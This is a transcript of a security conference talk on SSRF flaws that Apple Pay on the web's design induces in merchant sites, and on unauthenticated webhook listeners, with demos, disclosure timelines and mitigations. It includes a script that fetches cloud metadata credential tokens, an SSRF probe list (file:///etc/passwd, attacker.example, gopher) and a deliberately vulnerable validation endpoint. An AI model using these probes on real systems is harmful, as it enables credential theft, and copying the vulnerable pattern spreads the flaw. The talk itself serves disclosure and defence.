So what about our next talk? How many people here have used Apple Pay? Yeah? So the first time I used Apple Pay was actually on an air compressor at a gas station. Who knew that that was going to be at the cutting edge of technology and mobile payments, huh? And I kept using it in person. I was like, oh, that's pretty cool. Then I learned it was on the web, and I had the opportunity to order some coffee, as you do, off the internet, you know, cut out the middleman, ship direct to me. And I'm sitting there in bed and I was like, Apple Pay? I've never used this on the web. How does this work? Badoop. And it's done. Shipping information is preloaded. This is magic. Then I started thinking, I would rather use Apple Pay than buy from Amazon. So, much like all things that are magic, we come to DEF CON to have our hopes and dreams dashed. So, let's hear about how Apple Pay is severely broken, probably. Hopefully not compromising your credit card information. Let's give our speaker a big round of applause.

Thank you. All right. So I'm going to lay something on the table right now. This talk is about software architecture, and I'm not apologizing for it. Now, you may be wondering, how in the world did this guy get in here? Software talks are boring. And I would kind of agree with you. I've been to a lot of them. I've been a software engineer myself. And they can be very boring. Architecture talks can be especially boring. But most of those are on the positive side. You build something, it scales, it makes the client a lot of money. So now you're an expert. But I'm going to go on the negative side. This is a hacker convention, after all. Where does software architecture go horribly wrong? Obviously, when it scales, when it scatters vulnerabilities across the web.

So first, a bit about me. I have a background in math. I've been a web developer for a while. Then I started with bug bounties, and that shifted me a bit towards security. And now at PKC, I've been doing a lot of security work for clients. We're located in Huntington Beach, about a four hour drive away from here. You can visit us at pkc.io.

And now for an overview of the talk. First, I'll go over a couple of terms, which will later combine to form my criticism of Apple Pay. Then I'll do some demos. The focus is on finding a large number of easy-to-exploit bugs, so the demos will be quick and prerecorded. These demos are all against my own redeployments of open source stuff that has already been fixed. I won't be attacking any live e-commerce systems, since most of my disclosures to those are still private. Lastly, I'll have some general principles for designing better APIs.

I'm going to go pretty hard here on an architectural decision made by Apple. In discussing the security of software architecture, people tend to bring up vague principles and notions of who's responsible for what. But I'm going to back myself up with concrete examples. Better yet, these examples should be educational if you want to start testing SSRF yourself. The payloads are all pretty easy, and a lot of them you can find on the web. So this should be a great expository place to start.

So, on to definitions. There's this existing concept of a class break. It's the idea that software tends to be vulnerable in several places at once. Past research has focused on cases where you have one single weak piece of code, say Heartbleed, or SQL injection in a CMS plugin.
And then when that vulnerability gets found, there's this huge rush to get your instances patched, because it's broken in all these different places at once. You could frame a lot of the talks at this conference as class breaks. Currently, there's a lot of tooling to help companies stay on top of this. But there's another level that I've seen a lot of this year. It's not new, but it's becoming more common. A company will create an API or spec at this top level that isn't itself vulnerable, but in some way induces other people to write weak code. Some familiar examples of this might be the JWT "none" algorithm, or problems in SAML implementations. If you're looking for sheer volume of vulnerabilities, looking at this top level can be a great place to start. I couldn't find an existing general term for this top level, so I'm going to call it an inductive weakness. And here's the definition: it's a design flaw that encourages multiple parties to write vulnerable code with a similar exploit pattern across differing software stacks. For example, we might say that an API induces SSRF vulnerabilities, or that an API has an inductive SSRF weakness. This is wordy and might not seem entirely justified right now, but it should make more sense once we get to the demos.

And now for a refresher on the other term: SSRF. It's been around for a while, and it stands for server side request forgery. A lot of people tend to confuse this with CSRF, or cross-site request forgery, but in actuality, the ways you exploit these two things are very, very different. So the naming similarity is kind of unfortunate. SSRF is a bit of a hot topic right now because it's a lot easier to exploit than it used to be. In the past, there have been some really, really interesting talks on SSRF. I'll reference those later; it is a really interesting area. But for now, we have some really easy payloads, which we'll see towards the end of this section.

So, say this attacker on the top left wants to get to an internal-facing server on the bottom right. But the attacker doesn't have direct access. They can only go through this public-facing server displayed in the middle. So, the attacker then tries to find some weakness in that public-facing server. In the past, people have taken the URL and put it somewhere like a Host header, or in the body of some XML, in order to get the server to hit the desired location. The goal is to route requests through the server in the middle, as if it were a proxy, even though it's not trying to be one. Typically, we only call it SSRF if the attacker can use that proxy-like behavior to access or harm something internal. Even if it's not true SSRF and you can only proxy through, sometimes it does make sense to report it to companies, although then you probably shouldn't expect a bounty. And if you can get responses back, it's easier to exploit, and it's called transparent SSRF. Otherwise, it's called blind SSRF.

So, what can you do with this pattern? Turns out, it's quite powerful right now because of the defaults in popular cloud environments. This has been the most fruitful SSRF approach for me so far. Google Cloud and AWS both expose credentials by default on 169.254.169.254. Depending on the permissions assigned to the instance, this token can often access private storage buckets or other stuff. This is the easy SSRF approach I've been talking about.
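To make that concrete, here's a minimal sketch of what's sitting behind that IP. It's illustrative rather than an exploit: these requests only succeed when they originate from inside a cloud instance, or when an SSRF-able endpoint fetches the URLs on your behalf. The paths are the standard documented metadata routes for GCP and AWS.

```python
# Minimal sketch of what the cloud metadata service hands out.
# Only works from inside a GCP/AWS instance (or via a proxying,
# SSRF-able endpoint); these are the standard documented routes.
import urllib.request

# GCP: the /v1 routes require this header when called directly.
# (Some proxies strip or can't set headers, which is why the older
# /v1beta1 routes come up again in the demos.)
req = urllib.request.Request(
    "http://169.254.169.254/computeMetadata/v1/instance/"
    "service-accounts/default/token",
    headers={"Metadata-Flavor": "Google"},
)
print(urllib.request.urlopen(req, timeout=2).read().decode())

# AWS (IMDSv1): no special header needed, which makes it the softer target.
base = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
role = urllib.request.urlopen(base, timeout=2).read().decode().strip()
print(urllib.request.urlopen(base + role, timeout=2).read().decode())
```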
There has even been some pretty credible speculation that the AWS equivalent of this endpoint was the first step that enabled the recent Capital One breach. But I never go that far. I just stop here and report it. You can imagine, though, that if you can find a lot of cases where you might be able to proxy through a server, some of those are going to be AWS or GCP boxes, and a lot of those are going to have the default permissions. The other thing to note is that on screen here you see a curl command. That in itself does not demonstrate an SSRF vulnerability, because in this case I'm already inside the box. It's just demonstrative. It's when you can externally tell the server to hit that URL and give you back the token that it becomes SSRF. Also, to keep the naming straight, this slide is also not an inductive weakness. AWS and GCP aren't causing people to write weak code; they're just widening the consequences when people do. But what the slide does demonstrate is that if you want to do SSRF on someone using AWS or GCP right now, you have a very easy payload to start with.

So, what are some other easy things to try with SSRF? People have already been criticizing AWS and Google Cloud a lot for providing the metadata endpoint you saw in the previous slide. There have even been some rumors that AWS is in the process of hardening this up in response to the recent Capital One breach, so I'm not going to dwell on it too much. File URLs are another interesting thing to try, especially on older stacks. You may be very familiar with these from CTFs and the like. The other interesting thing is that if you can proxy through GET requests, you can do reflected XSS. You just have to point to a URL with some malicious HTML and JavaScript. Though then it's technically not SSRF, because the attack scenario is different. However, if your goal is to collect a bug bounty, this is a great thing to keep in mind if you're hitting a dead end trying to reach internal servers, because reflected XSS usually is considered within the scope of bug bounties.

But what if you want to dig deeper? There's been a lot of past work on cross-protocol attacks via SSRF. Gopher URLs are interesting because you can inject a wide range of characters that will eventually go into the TCP stream, so you have a lot of room for interacting with other protocols, like SMTP. There are a lot of different ways to get there, though. Sometimes it might be necessary to set up a server that redirects to the protocol you want. Other times you might just go with an HTTP URL and exploit a bug in the URL parser. Probably the coolest work on this is Orange Tsai's talk, A New Era of SSRF. However, libraries are getting stricter, and a lot of the easy stuff has been fixed. This is a really fun area of research, though, and I expect there will be additional chains discovered in the future.
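Before combining the two terms, here's the rough checklist of payloads from this section, expressed as a Python list so the comments can carry the caveats. The attacker host and the gopher payload are schematic placeholders; what actually works depends on the target's stack and URL parser.

```python
# Rough checklist of the SSRF probes discussed above, in the order I'd
# try them. The attacker host and the gopher payload are placeholders.
SSRF_PROBES = [
    "http://example.com/",                       # step zero: can we proxy out at all?
    "http://169.254.169.254/latest/meta-data/",  # AWS instance metadata (IMDSv1)
    "http://metadata.google.internal/computeMetadata/v1beta1/",  # GCP, header-lenient
    "file:///etc/passwd",                        # older stacks / permissive URL handlers
    "http://attacker.example/evil.html",         # reflected XSS if the response is echoed
    "gopher://127.0.0.1:25/_HELO%20localhost",   # cross-protocol, e.g. SMTP (schematic)
]
```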
And now we'll combine these two terms. All right. But before diving in, it's important to note that Apple Pay is composed of three different technologies under one brand. You may be familiar with the Buy with Apple Pay button, which appears in both Apple Pay in-app and Apple Pay on the web. There's also the upcoming Apple Card, but I have no idea where that fits into all of this. I am only criticizing Apple Pay on the web, since it has some problematic requirements for merchants. So, say you have an online store. Within the nomenclature, we would call you a merchant. What does your website need to do to support Apple Pay on the web?

When the user first clicks that Buy with Apple Pay button, Safari generates a validation URL, which is on one of about 30 apple.com subdomains. It's really strange. Then, in your client-side JavaScript, you have to send the validation URL to your back end. Then your server needs to grab a merchant session from that validation URL and return it to the client. This is all a bit wordy, though, and it's much better as a diagram. Luckily, I already have one. So, this should look familiar. Following the typical flow as a merchant, your server there in the middle would take in that URL to know which Apple server to connect to and grab a merchant session. But depending on your infrastructure, if you implemented it the way Apple originally documented, this was really dangerous functionality to add. The endpoint is ideal for an attacker who wants to do SSRF, and especially transparent SSRF, because the validation URL is user supplied. They're basically doing load balancing in the user's browser. I've asked Apple for some justification of this requirement, and after several months I still have no idea why it's there. In the original WWDC talk, there's some vague mention of handling the case where a merchant is compromised. But that doesn't explain why they allow the client to choose between validation URLs instead of just having one. And ultimately, they're providing a whole new way for attackers to compromise merchants. Google Pay certainly doesn't do this. Some merchants were safe for one reason or another, but we'll get to mitigations later.

Right now, it's time for a demo. These demos are not going to be particularly deep attack chains, but besides demonstrating breadth of attack surface, they should be illuminating if you are interested in testing SSRF yourself. Just please, if you try this at home, only try it against sites where you have permission. And report what you find. Don't go snooping around private storage buckets.

So, the first demo is against a Google Chrome Labs project that was deployed publicly via App Engine, but not in a production environment. I don't point this out to shame Google or the developer. Instead, I want to demonstrate that even talented, qualified people working on modern stacks were affected by this design flaw in Apple Pay. Okay, so here's my own deployment of this project, so we can see what I did against Google's deployment. As you can see, it has a Buy with Apple Pay button. It's getting an error because my deployment isn't fully configured, but our attack will still work. If we click it, we can see a request going out to an endpoint called Validate. It will pop up there in red. That's the endpoint I was talking about earlier. Normally you might attack this with something like Burp or mitmproxy, but I'm going to go old school with just curl. So, first we can clean up some headers. Then we modify the validation URL so we can conveniently replay different values. First I'm going to try to hit example.com, to see if we can proxy through the endpoint I'm hitting. It's going to take another try. So yeah, we're just proxying out to example.com. Again, that's not SSRF, but it is a useful first step in testing this stuff, because now we're free to try different payloads, knowing that we have that proxy-like behavior. So, let's try to hit the instance metadata endpoint. And yep, this is promising. It looks like we're getting through it on a Google Cloud box.
And then by feeding in metadata.google.internal, we confirm that that's the case. And from here, it's just a matter of browsing around directories and seeing what works. For whatever reason, /v1beta1 is less picky about headers than /v1. I have no idea why. But we can keep browsing. And now we're in the directories of the metadata server. We can see what permissions this box has access to, and even grab a token. This token is long expired by now, but don't worry, for some reason I put a black box over part of it anyway.

And now on to the next demo. For the next demo, we'll be attacking my own deployment of a page that used to be on webkit.org, because it's open source. The issue is fixed, but I deployed the vulnerable version from a few months ago on wk.jmadx.com for the purposes of the demo. Don't worry, though; this demo is offline by now. Importantly, just like the previous demo, the code on webkit.org was written by a well qualified developer at a large tech company. This may be even more convincing, because it demonstrates that even developers at Apple were not immune. In the original PoC I sent Apple, I just grabbed an AWS token. However, since I have this deployed on Google Cloud, the approach will be a little bit different, so we'll get a chance to see a slightly different payload. So yeah, here you can see my own deployment of the code that used to be on webkit.org. I love this art, but the button here also looks promising. It turns out we can see a merchant validation request happening here. If we click it again, it's going to go out to, in this tiny, tiny text there, merchantvalidation.php. It's different code, but because of the requirements imposed by Apple, we can repeat the same attack. So we're going to go through the same approach. Change up the validation URL, then clean up some headers. curl will automatically append the Content-Length header, so we don't need to worry about that. So let's go through the same process. We can try to hit instance metadata, but we won't have any luck, because the request methods aren't lining up in our favor. But we can see we can get traffic out to example.com. So from here, it's just a matter of trying out different payloads. And this is a classic PHP app, so the classic file URLs will work.

So this is a fairly deep-seated architectural problem, and I reported it to Apple back in February. But what has Apple done to mitigate it? So far, just documentation changes. Importantly, the documentation used to pretty much walk you through the process of adding a vulnerability to your website. Now the documentation has this little warning box. They seem really optimistic about how many developers actually read those. If you do happen across these warning boxes and read them carefully, the instructions are now valid. But for existing clients, I can't imagine too many developers are constantly revisiting the documentation to check what warnings were added. And here's the disclosure timeline. There's not much here. The main thing is that I reported this to Apple back in February and haven't seen any meaningful architectural changes. In my original proposal, I asked Apple to deprecate the current API and phase in a new one that didn't have these problems. But they haven't engaged with me in any discussion on that. They've just updated documentation and removed their bad example code. We'll get back to this later.
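Both demos exploited the same induced pattern, so it's worth seeing it in miniature. Here's a minimal sketch using Flask as a stand-in. It's not any particular project's code, and the endpoint name, certificate paths, and merchant identifiers are made up, but the shape matches what Apple's original documentation walked merchants through.

```python
# Minimal sketch of the induced pattern (NOT any particular project's
# code). The client hands us a validation URL, and we dutifully fetch
# it server-side with our merchant certificate attached.
from flask import Flask, jsonify, request
import requests

app = Flask(__name__)

@app.route("/validate", methods=["POST"])
def validate():
    # The attacker fully controls this value. That's the whole problem.
    validation_url = request.json["validationUrl"]
    resp = requests.post(
        validation_url,
        json={"merchantIdentifier": "merchant.example.shop",
              "domainName": "shop.example.com"},
        cert=("merchant_id.pem", "merchant_id.key"),  # merchant identity cert
    )
    # Transparent SSRF: whatever the server fetched goes straight back.
    return jsonify(resp.json())
```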
But for now, how would you mitigate this? My favorite mitigation so far has been to just remove support for Apple Pay entirely. That might not work for everyone, though. For everyone else, it's important to manually parse the validation URL and check it against Apple's list. It's kind of ugly to copy and paste 30 domains into some config file, but that's pretty much what you have to do. A couple of payment providers actually do this out of the box, though. So far, I'm just aware of Stripe and Braintree. So if you're using one of those, you're safe. They've actually been the main hurdle in collecting bug bounties. Even though I was able to collect some, a lot of modern companies tend to use one of these two payment providers, and given that, it's been a fairly big hurdle.

But what if you want to defend more broadly against SSRF? In my experience, very few people are protecting egress traffic. But when they do, it's a pretty big speed bump. This may make more or less sense depending on the size of your organization, how your network is laid out, and what your risk characteristics are with SSRF. But it may be an option to consider. Netflix also does some really great work in proactively dealing with the instance metadata endpoint in AWS. In general, though, it's good to take a look at what ports are open locally on your servers and add passwords, even when the network layer is theoretically protecting them.

On the other hand, here's some stuff I've seen that has holes in it. Part of what makes implementing support for Apple Pay so tricky is that there are a lot of potential fixes that might protect you from the typical payloads I've been feeding in, but that you can still poke holes in. Regexes are tricky, and I wouldn't recommend them as a mitigation for this issue at all. But besides the points on this slide, I would also discourage relying on a check that the host is merely some apple.com subdomain, even if you're not using weak regexes. Because then, if there's an open redirect anywhere on any apple.com subdomain, an attacker can use the open redirect to circumvent your check. Narrowing the check to specifically allow the 30 Apple Pay related subdomains is better. Unrelated, but if anyone knows of an open redirect on any apple.com subdomain, I would be glad to hear about it. But really, there's no way of getting around it. If you have to support Apple Pay on the web, you really should go through Apple's updated documentation and read through the warnings they've added. The architecture is still bad, but at least the documentation doesn't walk you through the process of adding a vulnerability.
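For reference, here's a minimal sketch of that manual allowlist check. The two hostnames shown are placeholders; the real list is the roughly 30 Apple Pay subdomains from Apple's documentation, copied verbatim.

```python
# Sketch of the allowlist mitigation. The hostnames below are
# placeholders; fill in the ~30 subdomains from Apple's documentation.
from urllib.parse import urlparse

APPLE_PAY_HOSTS = {
    "apple-pay-gateway.apple.com",       # placeholder
    "apple-pay-gateway-cert.apple.com",  # placeholder
    # ... the rest of Apple's published list goes here ...
}

def is_valid_validation_url(url: str) -> bool:
    parsed = urlparse(url)
    # Exact-match the hostname. No regexes, and no "is it on apple.com?"
    # check, which an open redirect on any apple.com subdomain defeats.
    return parsed.scheme == "https" and parsed.hostname in APPLE_PAY_HOSTS
```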
So, that wraps up the specifics on Apple Pay on the web and our first inductive weakness. I'll have more to say on Apple towards the end of this talk, but in the next section, I'll move on to another pattern that can induce vulnerabilities. So, webhooks are becoming a fairly common and useful way to tie the web together. We'll take a little bit of the heat off Apple now. There are a lot of webhooks out there right now, and nobody seems to agree on how they should be implemented; there are a lot of different approaches people are trying. But what's a webhook? Here's an example from Twilio. It's a way of telling a service to call your URL as soon as an event happens. Here you can see jmadx.com/sms registered. So Twilio will send me an HTTPS request every time it has a new SMS message for me.

But how have people been exploiting webhooks so far? They've gone after the sender of the webhook, in this case, Twilio. It's pretty similar to how I would test Apple Pay. Instead of entering your own server as the URL, you put in the AWS instance metadata IP, or try to do some cross-protocol stuff. This is just a general challenge of implementing webhooks. It's not an inductive weakness, because there's no central party inducing the pattern. There's no central party telling Twilio they have to have a webhook to enable this feature; it's just a really useful feature for Twilio to provide to their clients. But luckily, lots of people have already explored webhooks in this way. And webhooks do tend to be implemented by larger companies with much better footing in regards to security issues. So you can find a lot of bug bounty write-ups where people did exactly this. Even for getting payloads for some of the Apple Pay issues, webhook SSRF write-ups were really helpful.

But what have I been doing with webhooks? I apply the same inductive weakness model that worked with Apple Pay. Instead of going after the sender, I look for an attack surface the sender might be inducing in the listeners. It turns out that for Twilio, this approach works. How do the receivers of the webhooks know that the message is coming from Twilio? Twilio provides an HMAC, similar to how most webhooks are done right now. I'm singling out Twilio a little bit, but a lot of webhooks do this. They call it a signature, and that might make the cryptographers in the room cringe, but conceptually it does help to think of it as a signature. Assuming that receivers actually check it, it's not too bad. But when I took a look, most related open source projects failed to check the HMAC, so there were these unauthenticated endpoints lying around. And once I started poking around, it became apparent one reason why: Twilio's examples didn't check the HMAC either. Then, setting aside the bad example code, there's also an architectural problem here. I argue that since the easiest way to receive an HMAC-authenticated webhook is to disregard the HMAC, that's a design flaw. And I would also call it an inductive weakness.
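To make the missing check concrete, here's a sketch of what listeners should be doing. It follows my understanding of Twilio's documented scheme, HMAC-SHA1 over the request URL plus the sorted POST parameters, keyed with your auth token and base64-encoded, but treat those details as an assumption and prefer Twilio's official helper libraries, which ship a request validator that wraps this.

```python
# Sketch of the signature check that the listeners were skipping.
# Construction per my reading of Twilio's docs (an assumption; use
# Twilio's official request validator where possible): HMAC-SHA1 over
# the full webhook URL plus sorted POST params, base64-encoded.
import base64
import hashlib
import hmac

def verify_twilio_signature(auth_token: str, url: str,
                            params: dict, signature: str) -> bool:
    payload = url + "".join(k + params[k] for k in sorted(params))
    expected = base64.b64encode(
        hmac.new(auth_token.encode(), payload.encode(), hashlib.sha1).digest()
    ).decode()
    # Constant-time comparison, so the check itself isn't a side channel.
    return hmac.compare_digest(expected, signature)
```

The point isn't the exact construction; it's that a dozen lines like these were missing from most of the receivers I looked at.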
So now it's time for a demo. This demo is going to be slightly different. The example code wasn't on a public-facing server, so I didn't get any credentials from Twilio themselves, and therefore of course no bounty. But it's still worth showing, because it was copied and pasted elsewhere. So here's where I started, just looking around at the Twilio example code. On the readme, there's now a warning to protect your webhooks, but it turns out the example code still doesn't do that. Going even further, this example code takes a media URL parameter, which looks quite promising. And it's even quite generous, in that the example code fetches the contents of that media URL and puts them in a public-facing directory. So you might be able to guess where this is going. In the next tab, I have this deployed on a Google Cloud instance. It tells us to send a text message, but we don't need to do that. This webhook is unauthenticated, so we can use the snippet I have on the right and pretend we're Twilio, sending over a CSV attachment. But because of the URL we sent, pointing to Google Cloud instance metadata, we can see the token is now stored in that public directory. And by the way, this token is also long expired.

So here's the disclosure timeline, fairly similar to the Apple Pay one. But you might be wondering, are Twilio's competitors doing any better or worse? Turns out, with Nexmo, it's worse. Not only is the architecture similar, but you have to contact support to even get them to send you an HMAC. And even if you do contact support, some of the webhooks don't even have that option. I don't have much to say about this; it's pretty much beyond hope, so let's move on to another webhook.

So, GitLab. GitLab does something similar to Twilio, but with a static token instead of an HMAC. The implementation is a bit different, but the same level of optimism is there. They expect that users of the webhook will register that token and then check it when events are received. And here's the event that is sent by one of the webhooks if you enable it. So you can imagine what I did. I simply found a server that was receiving these webhooks. As usual, it was not validating that they were coming from GitLab. I won't name names. But I can't imagine, given what we've seen so far, that what I found was the only unauthenticated one. In any case, I decided to tweak the sample push event and send it over. Right off the bat, I was able to modify the repository URL and trigger extra builds for arbitrary repos. I didn't have any success deploying arbitrary code, but this did have one nasty consequence: it turned out I could store XSS payloads. The script would execute whenever someone clicked a particular button on their build pipeline page. And you don't need to log into anything to do this attack.

This really epitomizes the point I want to make. So far, we've been asking what vulnerabilities are in the software, but an equally important question is, what vulnerabilities does the software create? Once you start asking this question, you can find a lot of easy stuff that doesn't need particularly difficult payloads to exploit.

So these next few slides are going to be a bit text heavy, but I'm making a really aggressive claim here, that nearly everyone's doing webhooks wrong. So it's necessary to lay out some alternatives. I'll start with the coolest but least practical one. You can encrypt your outgoing webhooks with an authenticated cipher. The upside is that in the act of trying to use the information you send people, they will inevitably be authenticating it. The downside is there aren't a lot of good libraries for encapsulating this, so it's not very practical right now. But we can dream. Going a little more practical, you can do what Stripe and Square do. If you limit your webhook payload to just an event ID and expect the receiver of the webhook to fetch the rest, you're really not inducing much attack surface. The downside is that this does require an extra request from the listener to you. You do also have to worry about path injection, or path traversal, if that ID ends up inside a URL segment, since a lot of developers, probably most, will forget to URL-encode the value they put into the API call. But all things told, this is probably a good middle ground, and on the websites I've seen using this, I haven't found any practical ways to exploit path traversal, even for people who aren't careful about it.
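Here's a sketch of that thin-payload pattern from the listener's side. The events API, endpoint names, and credentials are hypothetical; the point is that the webhook body carries nothing worth forging, and the ID gets URL-encoded before it touches a path.

```python
# Sketch of the thin-payload webhook pattern. The sender's body carries
# only an event ID; the listener fetches the authoritative record itself.
# API base URL, endpoint names, and credentials are hypothetical.
from urllib.parse import quote
from flask import Flask, request
import requests

app = Flask(__name__)
API_BASE = "https://api.example.com/v1/events/"  # hypothetical sender API

@app.route("/webhook", methods=["POST"])
def webhook():
    event_id = request.json["event_id"]
    # URL-encode the ID so a forged "../../admin/keys" can't traverse paths.
    url = API_BASE + quote(event_id, safe="")
    event = requests.get(url, auth=("api_key", "api_secret")).json()
    handle(event)  # only data fetched from the source of truth gets trusted
    return "", 204

def handle(event):
    print("event from the source of truth:", event.get("type"))
```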
But the least aggressive approach, which works well for existing webhooks, is just to be more proactive about making sure that people use the HMAC. Most webhooks already do one testing request to ensure that the URL is publicly available and live, just to make sure they're not sending data somewhere it's going to be ignored. So it's not a huge change to do two requests instead: one with a valid HMAC and one with a deliberately broken one. It's then a matter of policy to decide what you want to do if those two requests get the same response code, indicating that the listener is unauthenticated. But even if you just warn people when a webhook endpoint appears unauthenticated, you're still miles ahead of what others are currently doing. I'd really like to see webhooks start doing this, since it's low risk and backwards compatible in a lot of cases.

So a lot of this so far has been negative, and intentionally so. But there is an upside. By designing your API to be defensive from the ground up, you have a lot of ability to prevent vulnerable code from being written. Let's take a look at one API that didn't and one that did. If you're looking at this from the attack side of things, this should also be illuminating for getting an idea of which APIs might be promising in terms of finding induced vulnerabilities.

So, Salesforce and DynamoDB are very different products, but they have an interesting area where they overlap. They both have to act as a source of truth with complicated business requirements piled on, to the point that each had to implement a custom SQL-like dialect. But they went about it in very different ways. If you've ever pentested a web app that uses Salesforce, hopefully this has been on your radar. I've gotten a lot of mileage out of it. Sometimes user input propagates out to a place where you can inject into this API call, much like you would with SQL. So how does Salesforce try to mitigate this? More documentation. This is becoming a theme. At first, this might seem inevitable given what Salesforce is required to do. But when Amazon tackled this, they did something interesting. DynamoDB forces you to parametrize your condition expressions. If you try to concatenate a raw value in there, it will be treated as a syntax error. You have to put it into this expression attribute values object. There are other ways you can go about attacking these calls, but they're a lot more limited and more complicated than if you can just inject into the syntax itself, like you can with full SQL. The way Amazon does this is kind of cumbersome, and you can see there are just a lot of fields on screen here. But I think it's a good trade-off given the strength of protection it provides.
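Here's roughly what that looks like with boto3. The table and attribute names are hypothetical, but the forced split between expression syntax and attacker-reachable values is the real mechanism.

```python
# Sketch of DynamoDB's forced parametrization via boto3. Table and
# attribute names are hypothetical. User input can only land in a value
# slot; splicing it into the expression string is a syntax error.
import boto3

table = boto3.resource("dynamodb").Table("Orders")  # hypothetical table

def orders_for(user_id: str):
    return table.query(
        KeyConditionExpression="user_id = :uid",      # fixed syntax
        ExpressionAttributeValues={":uid": user_id},  # value slot only
    )["Items"]
```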
So, let's get back to Apple, since they're probably the worst offender in this talk. After two months of silence, they came back with this as justification for their architecture: "Developers are responsible for implementing whatever security and networking best practices make the most sense for their environment." This is true, sort of. Developers do have a lot of responsibility over their apps. But the implication here is that Apple has no culpability in this. Luckily, I've got another great quote: "If you've built a chaos factory, you can't dodge responsibility for the chaos." Thank you. Both of these statements are right; I'm not just here to point out hypocrisy. Developers are responsible for not introducing vulnerabilities into their code base. But if you expect people to add an endpoint somewhere, you do have a level of responsibility for the attack surface you're creating.

But that's a purely ethical argument. Let's look at some of the financial aspects of inductive weaknesses. Once researchers start hunting for this stuff, and I encourage you to, especially if you go about it in an ethical way, I imagine there will be a large financial incentive for API designers to start thinking about it. Not just from the perspective of having to pay out bounties, but from other perspectives too. I got some nice bounties out of this Apple Pay issue, and none of my work needed very difficult payloads. And none of those bounties were from Apple. So I think it's fair to expect that once this talk is over, some people are going to start applying my approach. Also, think of where these people are going to report this stuff, and where I've been reporting this stuff. You're seeing the most embarrassing consequence here. But even if my talk hadn't been accepted to any conferences, there was a lot of private embarrassment as well. Apple doesn't seem to think that was much of an issue, but most of the websites I reported to did. They're like, yeah, we have this SSRF thing lying around; in some cases they just removed it. I wouldn't be surprised if they held that against Apple.

For another angle: in software development, there's this concept of technical debt. It's the idea that cutting corners early on has a cost that accumulates as a project grows. With regular tech debt, the fixes reside in your own code base, so the interest rate and the cost of fixing are tied to the growth of your own code base. But with inductive weaknesses, the fixes are in your clients' code, so the interest rate is tied to how much adoption your API sees. At a certain point, if you want to pay down the debt, you can't just push out an update to your own code like you would with, say, a library. You have to push out a breaking change, contact your customers, and tell them that they have a vulnerability because they chose you.

So here's really what I'm asking for from API designers, and it should be pretty cheap if you start thinking about this stuff early. I'd really like to see people start scrutinizing their example code, because it gets deployed a lot more often than you'd think. In the process of scrutinizing your example code, you may even discover inductive weaknesses. If Apple had done so, I certainly wouldn't have much to talk about. And beyond auditing your own example code: if you're a researcher, auditing other people's example code is a great place to start, because again, it gets deployed a lot, and sometimes the places it gets deployed are things people care about. Also, keep in mind that a lot of developers don't realize quite how dangerous it is to fetch an externally provided URL. But if there's one thing I want people to take away from this talk, it's that documentation is no excuse for bad architecture.

And here are the acknowledgments. I'd like to thank Jonathan at PKC for asking some initial questions, Arte at PKC for pointing me to the Nexmo stuff, and Ken at PKC for helping with the presentation.
And Andrew at the EFF for legal assistance. So, any questions? In the front here. That is an interesting approach; I haven't given it any thought. Oh, sorry, I'll repeat the question first. The question was whether mutually authenticated TLS might be a better approach to authenticating webhooks. I've actually never seen that, but it might be interesting. I'm not sure how much defense it would provide. Any more questions? Oh, I see one right here. Sorry, let's see. So, the question was where I've seen WAFs come into play here. Sometimes I've kind of wished that WAFs would just detect whenever I'm doing something suspicious with the validation URL. But obviously, this stuff wasn't public until just yesterday. In the future, that would be really great for the Apple Pay issue specifically. Any more? Well, thank you.